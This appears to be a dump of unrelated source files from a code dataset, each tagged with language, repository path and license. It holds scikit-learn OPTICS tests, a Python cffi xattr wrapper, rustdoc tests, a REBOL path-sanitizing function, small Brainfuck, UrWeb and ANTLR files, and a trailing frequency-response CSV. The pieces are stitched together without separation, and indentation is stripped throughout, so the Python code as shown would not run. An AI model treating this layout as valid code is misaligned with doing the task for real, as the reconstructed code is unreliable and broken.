def test_warn_if_metric_bool_data_no_bool():
# make sure a *single* conversion warning is raised if metric is boolean
# but data isn't
# non-regression test for
# https://github.com/scikit-learn/scikit-learn/issues/18996
pairwise_metric = "rogerstanimoto"
X = np.random.randint(2, size=(5, 2), dtype=np.int32)
msg = f"Data will be converted to boolean for metric {pairwise_metric}"
with pytest.warns(DataConversionWarning, match=msg) as warn_record:
OPTICS(metric=pairwise_metric).fit(X)
assert len(warn_record) == 1
def test_nowarn_if_metric_no_bool():
# make sure no conversion warning is raised if
# metric isn't boolean, no matter what the data type is
pairwise_metric = "minkowski"
X_bool = np.random.randint(2, size=(5, 2), dtype=bool)
X_num = np.random.randint(2, size=(5, 2), dtype=np.int32)
with pytest.warns(None) as warn_record:
# fit boolean data
OPTICS(metric=pairwise_metric).fit(X_bool)
# fit numeric data
OPTICS(metric=pairwise_metric).fit(X_num)
assert len(warn_record) == 0
def test_close_extract():
# Test extract where extraction eps is close to scaled max_eps
centers = [[1, 1], [-1, -1], [1, -1]]
X, labels_true = make_blobs(
n_samples=750, centers=centers, cluster_std=0.4, random_state=0
)
# Compute OPTICS
clust = OPTICS(max_eps=1.0, cluster_method="dbscan", eps=0.3, min_samples=10).fit(X)
# Cluster ordering starts at 0; max cluster label = 2 is 3 clusters
assert max(clust.labels_) == 2
@pytest.mark.parametrize("eps", [0.1, 0.3, 0.5])
@pytest.mark.parametrize("min_samples", [3, 10, 20])
def test_dbscan_optics_parity(eps, min_samples):
# Test that OPTICS clustering labels are <= 5% difference of DBSCAN
centers = [[1, 1], [-1, -1], [1, -1]]
X, labels_true = make_blobs(
n_samples=750, centers=centers, cluster_std=0.4, random_state=0
)
# calculate optics with dbscan extract at 0.3 epsilon
op = OPTICS(min_samples=min_samples, cluster_method="dbscan", eps=eps).fit(X)
# calculate dbscan labels
db = DBSCAN(eps=eps, min_samples=min_samples).fit(X)
contingency = contingency_matrix(db.labels_, op.labels_)
agree = min(
np.sum(np.max(contingency, axis=0)), np.sum(np.max(contingency, axis=1))
)
disagree = X.shape[0] - agree
percent_mismatch = np.round((disagree - 1) / X.shape[0], 2)
# verify label mismatch is <= 5% labels
assert percent_mismatch <= 0.05
def test_min_samples_edge_case():
C1 = [[0, 0], [0, 0.1], [0, -0.1]]
C2 = [[10, 10], [10, 9], [10, 11]]
C3 = [[100, 100], [100, 96], [100, 106]]
X = np.vstack((C1, C2, C3))
expected_labels = np.r_[[0] * 3, [1] * 3, [2] * 3]
clust = OPTICS(min_samples=3, max_eps=7, cluster_method="xi", xi=0.04).fit(X)
assert_array_equal(clust.labels_, expected_labels)
expected_labels = np.r_[[0] * 3, [1] * 3, [-1] * 3]
clust = OPTICS(min_samples=3, max_eps=3, cluster_method="xi", xi=0.04).fit(X)
assert_array_equal(clust.labels_, expected_labels)
expected_labels = np.r_[[-1] * 9]
with pytest.warns(UserWarning, match="All reachability values"):
clust = OPTICS(min_samples=4, max_eps=3, cluster_method="xi", xi=0.04).fit(X)
assert_array_equal(clust.labels_, expected_labels)
# try arbitrary minimum sizes
@pytest.mark.parametrize("min_cluster_size", range(2, X.shape[0] // 10, 23))
def test_min_cluster_size(min_cluster_size):
redX = X[::2] # reduce for speed
clust = OPTICS(min_samples=9, min_cluster_size=min_cluster_size).fit(redX)
cluster_sizes = np.bincount(clust.labels_[clust.labels_ != -1])
if cluster_sizes.size:
assert min(cluster_sizes) >= min_cluster_size
# check behaviour is the same when min_cluster_size is a fraction
clust_frac = OPTICS(
min_samples=9, min_cluster_size=min_cluster_size / redX.shape[0]
)
clust_frac.fit(redX)
assert_array_equal(clust.labels_, clust_frac.labels_)
@pytest.mark.parametrize("min_cluster_size", [0, -1, 1.1, 2.2])
def test_min_cluster_size_invalid(min_cluster_size):
clust = OPTICS(min_cluster_size=min_cluster_size)
with pytest.raises(ValueError, match="must be a positive integer or a "):
clust.fit(X)
def test_min_cluster_size_invalid2():
clust = OPTICS(min_cluster_size=len(X) + 1)
with pytest.raises(ValueError, match="must be no greater than the "):
clust.fit(X)
def test_processing_order():
# Ensure that we consider all unprocessed points,
# not only direct neighbors. when picking the next point.
Y = [[0], [10], [-10], [25]]
clust = OPTICS(min_samples=3, max_eps=15).fit(Y)
assert_array_equal(clust.reachability_, [np.inf, 10, 10, 15])
assert_array_equal(clust.core_distances_, [10, 15, np.inf, np.inf])
assert_array_equal(clust.ordering_, [0, 1, 2, 3])
def test_compare_to_ELKI():
# Expected values, computed with (future) ELKI 0.7.5 using:
# java -jar elki.jar cli -dbc.in csv -dbc.filter FixedDBIDsFilter
# -algorithm clustering.optics.OPTICSHeap -optics.minpts 5
# where the FixedDBIDsFilter gives 0-indexed ids.
r1 = [
np.inf,
1.0574896366427478,
0.7587934993548423,
0.7290174038973836,
0.7290174038973836,
0.7290174038973836,
0.6861627576116127,
0.7587934993548423,
0.9280118450166668,
1.1748022534146194,
3.3355455741292257,
0.49618389254482587,
0.2552805046961355,
0.2552805046961355,
0.24944622248445714,
0.24944622248445714,
0.24944622248445714,
0.2552805046961355,
0.2552805046961355,
0.3086779122185853,
4.163024452756142,
1.623152630340929,
0.45315840475822655,
0.25468325192031926,
0.2254004358159971,
0.18765711877083036,
0.1821471333893275,
0.1821471333893275,
0.18765711877083036,
0.18765711877083036,
0.2240202988740153,
1.154337614548715,
1.342604473837069,
1.323308536402633,
0.8607514948648837,
0.27219111215810565,
0.13260875220533205,
0.13260875220533205,
0.09890587675958984,
0.09890587675958984,
0.13548790801634494,
0.1575483940837384,
0.17515137170530226,
0.17575920159442388,
0.27219111215810565,
0.6101447895405373,
1.3189208094864302,
1.323308536402633,
2.2509184159764577,
2.4517810628594527,
3.675977064404973,
3.8264795626020365,
2.9130735341510614,
2.9130735341510614,
2.9130735341510614,
2.9130735341510614,
2.8459300127258036,
2.8459300127258036,
2.8459300127258036,
3.0321982337972537,
]
o1 = [
0,
3,
6,
4,
7,
8,
2,
9,
5,
1,
31,
30,
32,
34,
33,
38,
39,
35,
37,
36,
44,
21,
23,
24,
22,
25,
27,
29,
26,
28,
20,
40,
45,
46,
10,
15,
11,
13,
17,
19,
18,
12,
16,
14,
47,
49,
43,
48,
42,
41,
53,
57,
51,
52,
56,
59,
54,
55,
58,
50,
]
p1 = [
-1,
0,
3,
6,
6,
6,
8,
3,
7,
5,
1,
31,
30,
30,
34,
34,
34,
32,
32,
37,
36,
44,
21,
23,
24,
22,
25,
25,
22,
22,
22,
21,
40,
45,
46,
10,
15,
15,
13,
13,
15,
11,
19,
15,
10,
47,
12,
45,
14,
43,
42,
53,
57,
57,
57,
57,
59,
59,
59,
58,
]
# Tests against known extraction array
# Does NOT work with metric='euclidean', because sklearn euclidean has
# worse numeric precision. 'minkowski' is slower but more accurate.
clust1 = OPTICS(min_samples=5).fit(X)
assert_array_equal(clust1.ordering_, np.array(o1))
assert_array_equal(clust1.predecessor_[clust1.ordering_], np.array(p1))
assert_allclose(clust1.reachability_[clust1.ordering_], np.array(r1))
# ELKI currently does not print the core distances (which are not used much
# in literature, but we can at least ensure to have this consistency:
for i in clust1.ordering_[1:]:
assert clust1.reachability_[i] >= clust1.core_distances_[clust1.predecessor_[i]]
# Expected values, computed with (future) ELKI 0.7.5 using
r2 = [
np.inf,
np.inf,
np.inf,
np.inf,
np.inf,
np.inf,
np.inf,
np.inf,
np.inf,
np.inf,
np.inf,
0.27219111215810565,
0.13260875220533205,
0.13260875220533205,
0.09890587675958984,
0.09890587675958984,
0.13548790801634494,
0.1575483940837384,
0.17515137170530226,
0.17575920159442388,
0.27219111215810565,
0.4928068613197889,
np.inf,
0.2666183922512113,
0.18765711877083036,
0.1821471333893275,
0.1821471333893275,
0.1821471333893275,
0.18715928772277457,
0.18765711877083036,
0.18765711877083036,
0.25468325192031926,
np.inf,
0.2552805046961355,
0.2552805046961355,
0.24944622248445714,
0.24944622248445714,
0.24944622248445714,
0.2552805046961355,
0.2552805046961355,
0.3086779122185853,
0.34466409325984865,
np.inf,
np.inf,
np.inf,
np.inf,
np.inf,
np.inf,
np.inf,
np.inf,
np.inf,
np.inf,
np.inf,
np.inf,
np.inf,
np.inf,
np.inf,
np.inf,
np.inf,
np.inf,
]
o2 = [
0,
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
15,
11,
13,
17,
19,
18,
12,
16,
14,
47,
46,
20,
22,
25,
23,
27,
29,
24,
26,
28,
21,
30,
32,
34,
33,
38,
39,
35,
37,
36,
31,
40,
41,
42,
43,
44,
45,
48,
49,
50,
51,
52,
53,
54,
55,
56,
57,
58,
59,
]
p2 = [
-1,
-1,
-1,
-1,
-1,
-1,
-1,
-1,
-1,
-1,
-1,
10,
15,
15,
13,
13,
15,
11,
19,
15,
10,
47,
-1,
20,
22,
25,
25,
25,
25,
22,
22,
23,
-1,
30,
30,
34,
34,
34,
32,
32,
37,
38,
-1,
-1,
-1,
-1,
-1,
-1,
-1,
-1,
-1,
-1,
-1,
-1,
-1,
-1,
-1,
-1,
-1,
-1,
]
clust2 = OPTICS(min_samples=5, max_eps=0.5).fit(X)
assert_array_equal(clust2.ordering_, np.array(o2))
assert_array_equal(clust2.predecessor_[clust2.ordering_], np.array(p2))
assert_allclose(clust2.reachability_[clust2.ordering_], np.array(r2))
index = np.where(clust1.core_distances_ <= 0.5)[0]
assert_allclose(clust1.core_distances_[index], clust2.core_distances_[index])
def test_wrong_cluster_method():
clust = OPTICS(cluster_method="superfancy")
with pytest.raises(ValueError, match="cluster_method should be one of "):
clust.fit(X)
def test_extract_dbscan():
# testing an easy dbscan case. Not including clusters with different
# densities.
rng = np.random.RandomState(0)
n_points_per_cluster = 20
C1 = [-5, -2] + 0.2 * rng.randn(n_points_per_cluster, 2)
C2 = [4, -1] + 0.2 * rng.randn(n_points_per_cluster, 2)
C3 = [1, 2] + 0.2 * rng.randn(n_points_per_cluster, 2)
C4 = [-2, 3] + 0.2 * rng.randn(n_points_per_cluster, 2)
X = np.vstack((C1, C2, C3, C4))
clust = OPTICS(cluster_method="dbscan", eps=0.5).fit(X)
assert_array_equal(np.sort(np.unique(clust.labels_)), [0, 1, 2, 3])
def test_precomputed_dists():
redX = X[::2]
dists = pairwise_distances(redX, metric="euclidean")
clust1 = OPTICS(min_samples=10, algorithm="brute", metric="precomputed").fit(dists)
clust2 = OPTICS(min_samples=10, algorithm="brute", metric="euclidean").fit(redX)
assert_allclose(clust1.reachability_, clust2.reachability_)
assert_array_equal(clust1.labels_, clust2.labels_)
| Python | 5 | MaiRajborirug/scikit-learn | sklearn/cluster/tests/test_optics.py | [
"BSD-3-Clause"
] |
import "std/test"
test.run("Check numeric separator", fn(assert) {
const num_no_separators = 10000000
const num_with_separators1 = 10_000_000
const num_with_separators2 = 10__000__000
const num_with_separators3 = 10_000_000_
assert.isEq(num_no_separators, num_with_separators1)
assert.isEq(num_no_separators, num_with_separators2)
assert.isEq(num_no_separators, num_with_separators3)
const float_no_separators = 10000.00
const float_with_separators = 10_000.00
assert.isEq(float_no_separators, float_with_separators)
const hex_no_separators = 0xAB12EF58
const hex_with_separators1 = 0xAB_12_EF_58
const hex_with_separators2 = 0x_AB_12_EF_58
assert.isEq(hex_no_separators, hex_with_separators1)
assert.isEq(hex_no_separators, hex_with_separators2)
})
test.run("Test hex literal", fn(assert) {
const dec = 10
const hex = 0x0A
assert.isEq(dec, hex)
})
test.run("Test binary literal", fn(assert) {
const dec = 10
const bin = 0b1010
assert.isEq(dec, bin)
})
test.run("Test octal literal", fn(assert) {
const dec = 10
const oct = 0o12
assert.isEq(dec, oct)
})
| Inform 7 | 4 | lfkeitel/nitrogen | tests/basic/numbers.ni | [
"BSD-3-Clause"
] |
exec("swigtest.start", -1);
checkequal(test("Hello"), "Hello", "test(""Hello"")");
f = new_Foo("Greetings");
checkequal(Foo_str_get(f), "Greetings", "new_Foo(""Greetings"")");
checkequal(Foo_test(f, "Hello"), "Hello", "Foo_test(f)");
delete_Foo(f);
checkequal(Foo_statictest("Hello", 1), "Hello", "Foo_statictest(""Hello"", 1)");
checkequal(test_def("Hello", 1), "Hello", "test_def(""Hello"", 1)");
checkequal(test_def("Hello"), "Hello", "test_def(""Hello"")");
exec("swigtest.quit", -1);
| Scilab | 2 | kyletanyag/LL-Smartcard | cacreader/swig-4.0.2/Examples/test-suite/scilab/varargs_runme.sci | [
"BSD-3-Clause"
] |
[
Three loop bounds: i,j,k live at c0,c1,c2 accordingly. A triple loop runs and
increments the target (at c3).
]
Set i
+++++ +++++ +++++ +++++ +++++
[
Set j for the next iteration of the inner loop
> +++++ +++++ +++++ +++++ +++++ +++++
[
Set k for the next iteration of the innermost loop
> +++++ +++++ +++++ +++++ +++++ +++++ +++++
[ This is the innermost loop
>+< Point to c3; increment it; then point back to c2
-
]
< - Decrement j and check if the inner loop iterates again
]
< - Decrement i and check if outer loop iterates again
]
| Brainfuck | 3 | mikiec84/code-for-blog | 2017/bfjit/bf-programs/nested-loop.bf | [
"Unlicense"
] |
import os
from cffi import FFI
# Workaround for the EON/termux build of Python having os.*xattr removed.
ffi = FFI()
ffi.cdef("""
int setxattr(const char *path, const char *name, const void *value, size_t size, int flags);
ssize_t getxattr(const char *path, const char *name, void *value, size_t size);
ssize_t listxattr(const char *path, char *list, size_t size);
int removexattr(const char *path, const char *name);
""")
libc = ffi.dlopen(None)
def setxattr(path, name, value, flags=0):
path = path.encode()
name = name.encode()
if libc.setxattr(path, name, value, len(value), flags) == -1:
raise OSError(ffi.errno, f"{os.strerror(ffi.errno)}: setxattr({path}, {name}, {value}, {flags})")
def getxattr(path, name, size=128):
path = path.encode()
name = name.encode()
value = ffi.new(f"char[{size}]")
l = libc.getxattr(path, name, value, size)
if l == -1:
# errno 61 means attribute hasn't been set
if ffi.errno == 61:
return None
raise OSError(ffi.errno, f"{os.strerror(ffi.errno)}: getxattr({path}, {name}, {size})")
return ffi.buffer(value)[:l]
def listxattr(path, size=128):
path = path.encode()
attrs = ffi.new(f"char[{size}]")
l = libc.listxattr(path, attrs, size)
if l == -1:
raise OSError(ffi.errno, f"{os.strerror(ffi.errno)}: listxattr({path}, {size})")
# attrs is b'\0' delimited values (so chop off trailing empty item)
return [a.decode() for a in ffi.buffer(attrs)[:l].split(b"\0")[0:-1]]
def removexattr(path, name):
path = path.encode()
name = name.encode()
if libc.removexattr(path, name) == -1:
raise OSError(ffi.errno, f"{os.strerror(ffi.errno)}: removexattr({path}, {name})")
| Python | 4 | Neptos/openpilot | common/xattr.py | [
"MIT"
] |
// @has deprecated/index.html '//*[@class="item-left module-item"]/span[@class="stab deprecated"]' \
// 'Deprecated'
// @has - '//*[@class="item-right docblock-short"]' 'Deprecated docs'
// @has deprecated/struct.S.html '//*[@class="stab deprecated"]' \
// 'Deprecated since 1.0.0: text'
/// Deprecated docs
#[deprecated(since = "1.0.0", note = "text")]
pub struct S;
// @matches deprecated/index.html '//*[@class="item-right docblock-short"]' '^Docs'
/// Docs
pub struct T;
// @matches deprecated/struct.U.html '//*[@class="stab deprecated"]' \
// 'Deprecated since 1.0.0$'
#[deprecated(since = "1.0.0")]
pub struct U;
// @matches deprecated/struct.V.html '//*[@class="stab deprecated"]' \
// 'Deprecated: text$'
#[deprecated(note = "text")]
pub struct V;
// @matches deprecated/struct.W.html '//*[@class="stab deprecated"]' \
// 'Deprecated$'
#[deprecated]
pub struct W;
// @matches deprecated/struct.X.html '//*[@class="stab deprecated"]' \
// 'Deprecated: shorthand reason$'
#[deprecated = "shorthand reason"]
pub struct X;
| Rust | 4 | mbc-git/rust | src/test/rustdoc/deprecated.rs | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] |
! Copyright 2016 The Go Authors. All rights reserved.
! Use of this source code is governed by a BSD-style
! license that can be found in the LICENSE file.
function the_answer() result(j) bind(C)
use iso_c_binding, only: c_int
integer(c_int) :: j ! output
j = 42
end function the_answer
| FORTRAN | 4 | Havoc-OS/androidprebuilts_go_linux-x86 | misc/cgo/fortran/answer.f90 | [
"BSD-3-Clause"
] |
table t1 : {A : int, B : string, C : float, D : bool}
fun display (q : sql_query [T1 = [A = int, B = string, C = float, D = bool]] []) =
s <- query q
(fn fs _ => return (Some fs.T1))
None;
return <html><body>
{case s of
None => cdata "Row not found."
| Some s =>
<body>
A: {cdata (show _ s.A)}<br/>
B: {cdata (show _ s.B)}<br/>
C: {cdata (show _ s.C)}<br/>
D: {cdata (show _ s.D)}<br/>
</body>}
</body></html>
fun lookupA (inp : {A : string}) =
display (SELECT * FROM t1 WHERE t1.A = {readError _ inp.A})
fun lookupB (inp : {B : string}) =
display (SELECT * FROM t1 WHERE t1.B = {inp.B})
fun lookupC (inp : {C : string}) =
display (SELECT * FROM t1 WHERE t1.C = {readError _ inp.C})
fun lookupD (inp : {D : string}) =
display (SELECT * FROM t1 WHERE t1.D = {readError _ inp.D})
fun main () : transaction page = return <html><body>
<lform>
A: <textbox{#A}/>
<submit action={lookupA}/>
</lform>
<lform>
B: <textbox{#B}/>
<submit action={lookupB}/>
</lform>
<lform>
C: <textbox{#C}/>
<submit action={lookupC}/>
</lform>
<lform>
D: <textbox{#D}/>
<submit action={lookupD}/>
</lform>
</body></html>
| UrWeb | 4 | apple314159/urweb | tests/pquery.ur | [
"BSD-3-Clause"
] |
REBOL [
Title: "secure-clean-path"
File: %secure-clean-path.r
Date: 19-Sep-2002
Version: 1.0.1
Author: ["Brian Hawley" "Anton Rolls"]
Rights: {
Copyright (C) Brian Hawley and Anton Rolls 2002. License for
redistribution, use and modification is granted only if this
copyright notice is included, and does not in any way confer
ownership. It is requested, but not required, that the authors
be notified of any use or modification, for quality-control
purposes.
}
Purpose: {Cleans up parent markers in a path, whilst restricting the output to a sandbox directory}
]
;-- (Nenad Rakocevic)
;-- script trimmed down to the function only
;-- most of comments and unit tests removed
;-- minor changes in the function body ("/" factorized, index? replaced by offset?)
;--
;-- Full script can be found here: http://www.rebol.org/view-script.r?script=secure-clean-path.r
secure-clean-path: func [
target [any-string!] {The path to be cleaned}
/limit {Limit paths relative to this root}
root [any-string!] {The root path (Default "", not applied if "")}
/nocopy {Modify target instead of copy}
/local root-rule a b c slash dot
] [
dot: "."
slash: "/"
unless nocopy [target: at copy head target index? target]
root-rule: either all [root not empty? root] [
either #"/" = pick root length? root [root] [[root slash]]
] [
[slash | none]
]
if parse/all target [
root-rule limit:
any [
a: dot [slash | end] (remove/part a 2) :a |
a: some slash b: (remove/part a b) :a |
a: some dot b: [slash | end] c: (
loop (offset? a b) - 1 [
either all [
b: find/reverse back a slash
-1 <= offset? limit b
] [a: next b] [a: limit break]
]
) :a (
remove/part a c
) |
thru slash
] to end
] [target]
]
| R | 4 | 0xflotus/red | system/utils/secure-clean-path.r | [
"BSL-1.0",
"BSD-3-Clause"
] |
lexer grammar t056lexer12;
options {language=JavaScript;}
B : x='a' x='b' ;
| G-code | 3 | DanielMabadeje/Artificial-Intelligence-Deep-Learning-Machine-Learning-Tutorials | java/java2py/antlr-3.1.3/runtime/JavaScript/tests/functional/t056lexer12.g | [
"Apache-2.0"
] |
=pod
=head1 NAME
ossl_random_add_conf_module - internal random configuration module
=head1 SYNOPSIS
#include "crypto/rand.h"
/* Configuration */
void ossl_random_add_conf_module(void);
=head1 DESCRIPTION
ossl_random_add_conf_module() adds the random configuration module
for providers.
This allows the type and parameters of the stardard setup of random number
generators to be configured with an OpenSSL L<config(5)> file.
=head1 RETURN VALUES
ossl_random_add_conf_module() doesn't return any value.
=head1 SEE ALSO
L<OSSL_PROVIDER(3)>, L<ossl_provider_new(3)>, L<provider-rand(7)>
=head1 HISTORY
The functions described here were all added in OpenSSL 3.0.
=head1 COPYRIGHT
Copyright 2020 The OpenSSL Project Authors. All Rights Reserved.
Licensed under the Apache License 2.0 (the "License"). You may not use
this file except in compliance with the License. You can obtain a copy
in the file LICENSE in the source distribution or at
L<https://www.openssl.org/source/license.html>.
=cut
| Pod | 4 | pmesnier/openssl | doc/internal/man3/ossl_random_add_conf_module.pod | [
"Apache-2.0"
] |
frequency,raw
20.00,-4.24
20.20,-4.17
20.40,-4.09
20.61,-4.03
20.81,-3.95
21.02,-3.89
21.23,-3.84
21.44,-3.80
21.66,-3.76
21.87,-3.73
22.09,-3.69
22.31,-3.67
22.54,-3.65
22.76,-3.63
22.99,-3.63
23.22,-3.61
23.45,-3.60
23.69,-3.60
23.92,-3.60
24.16,-3.59
24.40,-3.59
24.65,-3.61
24.89,-3.62
25.14,-3.63
25.39,-3.63
25.65,-3.64
25.91,-3.65
26.16,-3.66
26.43,-3.66
26.69,-3.67
26.96,-3.67
27.23,-3.67
27.50,-3.68
27.77,-3.69
28.05,-3.69
28.33,-3.70
28.62,-3.70
28.90,-3.70
29.19,-3.71
29.48,-3.70
29.78,-3.71
30.08,-3.71
30.38,-3.71
30.68,-3.70
30.99,-3.70
31.30,-3.69
31.61,-3.68
31.93,-3.67
32.24,-3.67
32.57,-3.66
32.89,-3.64
33.22,-3.64
33.55,-3.62
33.89,-3.62
34.23,-3.61
34.57,-3.60
34.92,-3.60
35.27,-3.58
35.62,-3.58
35.97,-3.58
36.33,-3.57
36.70,-3.56
37.06,-3.56
37.43,-3.54
37.81,-3.54
38.19,-3.53
38.57,-3.51
38.95,-3.51
39.34,-3.50
39.74,-3.50
40.14,-3.49
40.54,-3.48
40.94,-3.47
41.35,-3.47
41.76,-3.46
42.18,-3.46
42.60,-3.46
43.03,-3.46
43.46,-3.47
43.90,-3.49
44.33,-3.50
44.78,-3.51
45.23,-3.52
45.68,-3.53
46.13,-3.54
46.60,-3.54
47.06,-3.54
47.53,-3.54
48.01,-3.53
48.49,-3.55
48.97,-3.56
49.46,-3.57
49.96,-3.57
50.46,-3.56
50.96,-3.55
51.47,-3.56
51.99,-3.55
52.51,-3.53
53.03,-3.52
53.56,-3.51
54.10,-3.50
54.64,-3.49
55.18,-3.48
55.74,-3.47
56.29,-3.46
56.86,-3.45
57.42,-3.44
58.00,-3.42
58.58,-3.41
59.16,-3.39
59.76,-3.37
60.35,-3.37
60.96,-3.36
61.57,-3.36
62.18,-3.36
62.80,-3.35
63.43,-3.34
64.07,-3.33
64.71,-3.32
65.35,-3.31
66.01,-3.30
66.67,-3.29
67.33,-3.28
68.01,-3.27
68.69,-3.27
69.37,-3.26
70.07,-3.25
70.77,-3.24
71.48,-3.23
72.19,-3.22
72.91,-3.22
73.64,-3.21
74.38,-3.20
75.12,-3.20
75.87,-3.19
76.63,-3.18
77.40,-3.17
78.17,-3.17
78.95,-3.16
79.74,-3.16
80.54,-3.16
81.35,-3.17
82.16,-3.18
82.98,-3.17
83.81,-3.19
84.65,-3.20
85.50,-3.21
86.35,-3.22
87.22,-3.24
88.09,-3.26
88.97,-3.27
89.86,-3.28
90.76,-3.30
91.66,-3.29
92.58,-3.30
93.51,-3.29
94.44,-3.29
95.39,-3.28
96.34,-3.28
97.30,-3.28
98.28,-3.27
99.26,-3.27
100.25,-3.26
101.25,-3.26
102.27,-3.25
103.29,-3.25
104.32,-3.23
105.37,-3.23
106.42,-3.22
107.48,-3.21
108.56,-3.21
109.64,-3.19
110.74,-3.17
111.85,-3.14
112.97,-3.13
114.10,-3.09
115.24,-3.07
116.39,-3.04
117.55,-3.02
118.73,-2.99
119.92,-2.96
121.12,-2.93
122.33,-2.91
123.55,-2.88
124.79,-2.86
126.03,-2.84
127.29,-2.81
128.57,-2.80
129.85,-2.78
131.15,-2.75
132.46,-2.73
133.79,-2.70
135.12,-2.69
136.48,-2.65
137.84,-2.63
139.22,-2.63
140.61,-2.61
142.02,-2.58
143.44,-2.56
144.87,-2.55
146.32,-2.54
147.78,-2.53
149.26,-2.52
150.75,-2.53
152.26,-2.52
153.78,-2.52
155.32,-2.53
156.88,-2.53
158.44,-2.54
160.03,-2.55
161.63,-2.56
163.24,-2.56
164.88,-2.56
166.53,-2.56
168.19,-2.56
169.87,-2.56
171.57,-2.56
173.29,-2.55
175.02,-2.55
176.77,-2.56
178.54,-2.56
180.32,-2.54
182.13,-2.53
183.95,-2.52
185.79,-2.51
187.65,-2.51
189.52,-2.50
191.42,-2.49
193.33,-2.48
195.27,-2.47
197.22,-2.47
199.19,-2.47
201.18,-2.45
203.19,-2.44
205.23,-2.44
207.28,-2.41
209.35,-2.41
211.44,-2.40
213.56,-2.38
215.69,-2.36
217.85,-2.35
220.03,-2.33
222.23,-2.32
224.45,-2.28
226.70,-2.26
228.96,-2.24
231.25,-2.21
233.57,-2.19
235.90,-2.17
238.26,-2.15
240.64,-2.12
243.05,-2.09
245.48,-2.06
247.93,-2.03
250.41,-2.02
252.92,-1.98
255.45,-1.95
258.00,-1.93
260.58,-1.91
263.19,-1.88
265.82,-1.86
268.48,-1.83
271.16,-1.81
273.87,-1.79
276.61,-1.77
279.38,-1.75
282.17,-1.73
284.99,-1.70
287.84,-1.68
290.72,-1.64
293.63,-1.62
296.57,-1.58
299.53,-1.56
302.53,-1.55
305.55,-1.51
308.61,-1.50
311.69,-1.47
314.81,-1.43
317.96,-1.42
321.14,-1.40
324.35,-1.39
327.59,-1.36
330.87,-1.34
334.18,-1.32
337.52,-1.29
340.90,-1.26
344.30,-1.23
347.75,-1.21
351.23,-1.18
354.74,-1.15
358.28,-1.11
361.87,-1.08
365.49,-1.05
369.14,-1.03
372.83,-1.01
376.56,-1.00
380.33,-0.96
384.13,-0.95
387.97,-0.94
391.85,-0.93
395.77,-0.91
399.73,-0.91
403.72,-0.90
407.76,-0.89
411.84,-0.88
415.96,-0.87
420.12,-0.87
424.32,-0.86
428.56,-0.85
432.85,-0.84
437.18,-0.83
441.55,-0.80
445.96,-0.79
450.42,-0.78
454.93,-0.76
459.48,-0.75
464.07,-0.74
468.71,-0.72
473.40,-0.73
478.13,-0.72
482.91,-0.73
487.74,-0.73
492.62,-0.74
497.55,-0.75
502.52,-0.75
507.55,-0.76
512.62,-0.75
517.75,-0.74
522.93,-0.73
528.16,-0.72
533.44,-0.69
538.77,-0.67
544.16,-0.64
549.60,-0.61
555.10,-0.59
560.65,-0.56
566.25,-0.52
571.92,-0.51
577.64,-0.50
583.41,-0.48
589.25,-0.46
595.14,-0.45
601.09,-0.45
607.10,-0.44
613.17,-0.42
619.30,-0.41
625.50,-0.41
631.75,-0.40
638.07,-0.39
644.45,-0.38
650.89,-0.36
657.40,-0.34
663.98,-0.31
670.62,-0.29
677.32,-0.26
684.10,-0.22
690.94,-0.17
697.85,-0.13
704.83,-0.09
711.87,-0.05
718.99,-0.01
726.18,0.03
733.44,0.06
740.78,0.10
748.19,0.12
755.67,0.13
763.23,0.13
770.86,0.13
778.57,0.13
786.35,0.13
794.22,0.11
802.16,0.10
810.18,0.09
818.28,0.08
826.46,0.08
834.73,0.07
843.08,0.07
851.51,0.07
860.02,0.08
868.62,0.08
877.31,0.08
886.08,0.09
894.94,0.10
903.89,0.10
912.93,0.10
922.06,0.11
931.28,0.10
940.59,0.09
950.00,0.09
959.50,0.09
969.09,0.09
978.78,0.09
988.57,0.09
998.46,0.10
1008.44,0.12
1018.53,0.15
1028.71,0.18
1039.00,0.22
1049.39,0.25
1059.88,0.29
1070.48,0.33
1081.19,0.38
1092.00,0.43
1102.92,0.49
1113.95,0.54
1125.09,0.61
1136.34,0.67
1147.70,0.75
1159.18,0.81
1170.77,0.86
1182.48,0.93
1194.30,0.98
1206.25,1.03
1218.31,1.09
1230.49,1.13
1242.80,1.17
1255.22,1.21
1267.78,1.25
1280.45,1.29
1293.26,1.34
1306.19,1.37
1319.25,1.41
1332.45,1.45
1345.77,1.50
1359.23,1.55
1372.82,1.62
1386.55,1.67
1400.41,1.72
1414.42,1.78
1428.56,1.85
1442.85,1.90
1457.28,1.96
1471.85,2.02
1486.57,2.07
1501.43,2.14
1516.45,2.21
1531.61,2.28
1546.93,2.35
1562.40,2.43
1578.02,2.51
1593.80,2.57
1609.74,2.66
1625.84,2.76
1642.10,2.86
1658.52,2.97
1675.10,3.07
1691.85,3.17
1708.77,3.28
1725.86,3.39
1743.12,3.51
1760.55,3.63
1778.15,3.76
1795.94,3.88
1813.90,4.02
1832.03,4.16
1850.36,4.32
1868.86,4.47
1887.55,4.63
1906.42,4.79
1925.49,4.98
1944.74,5.16
1964.19,5.36
1983.83,5.56
2003.67,5.77
2023.71,5.96
2043.94,6.16
2064.38,6.36
2085.03,6.54
2105.88,6.74
2126.94,6.92
2148.20,7.11
2169.69,7.29
2191.38,7.46
2213.30,7.62
2235.43,7.79
2257.78,7.94
2280.36,8.07
2303.17,8.21
2326.20,8.34
2349.46,8.48
2372.95,8.60
2396.68,8.72
2420.65,8.83
2444.86,8.95
2469.31,9.06
2494.00,9.18
2518.94,9.29
2544.13,9.39
2569.57,9.48
2595.27,9.58
2621.22,9.68
2647.43,9.76
2673.90,9.84
2700.64,9.90
2727.65,9.95
2754.93,9.98
2782.48,10.00
2810.30,9.98
2838.40,9.95
2866.79,9.89
2895.46,9.83
2924.41,9.74
2953.65,9.64
2983.19,9.54
3013.02,9.41
3043.15,9.27
3073.58,9.12
3104.32,8.97
3135.36,8.82
3166.72,8.69
3198.38,8.54
3230.37,8.40
3262.67,8.25
3295.30,8.11
3328.25,7.96
3361.53,7.80
3395.15,7.63
3429.10,7.46
3463.39,7.27
3498.03,7.11
3533.01,6.95
3568.34,6.79
3604.02,6.63
3640.06,6.48
3676.46,6.34
3713.22,6.21
3750.36,6.08
3787.86,5.96
3825.74,5.86
3864.00,5.78
3902.64,5.71
3941.66,5.65
3981.08,5.56
4020.89,5.45
4061.10,5.31
4101.71,5.18
4142.73,5.03
4184.15,4.87
4226.00,4.70
4268.26,4.53
4310.94,4.33
4354.05,4.15
4397.59,3.97
4441.56,3.79
4485.98,3.62
4530.84,3.46
4576.15,3.30
4621.91,3.17
4668.13,3.05
4714.81,2.93
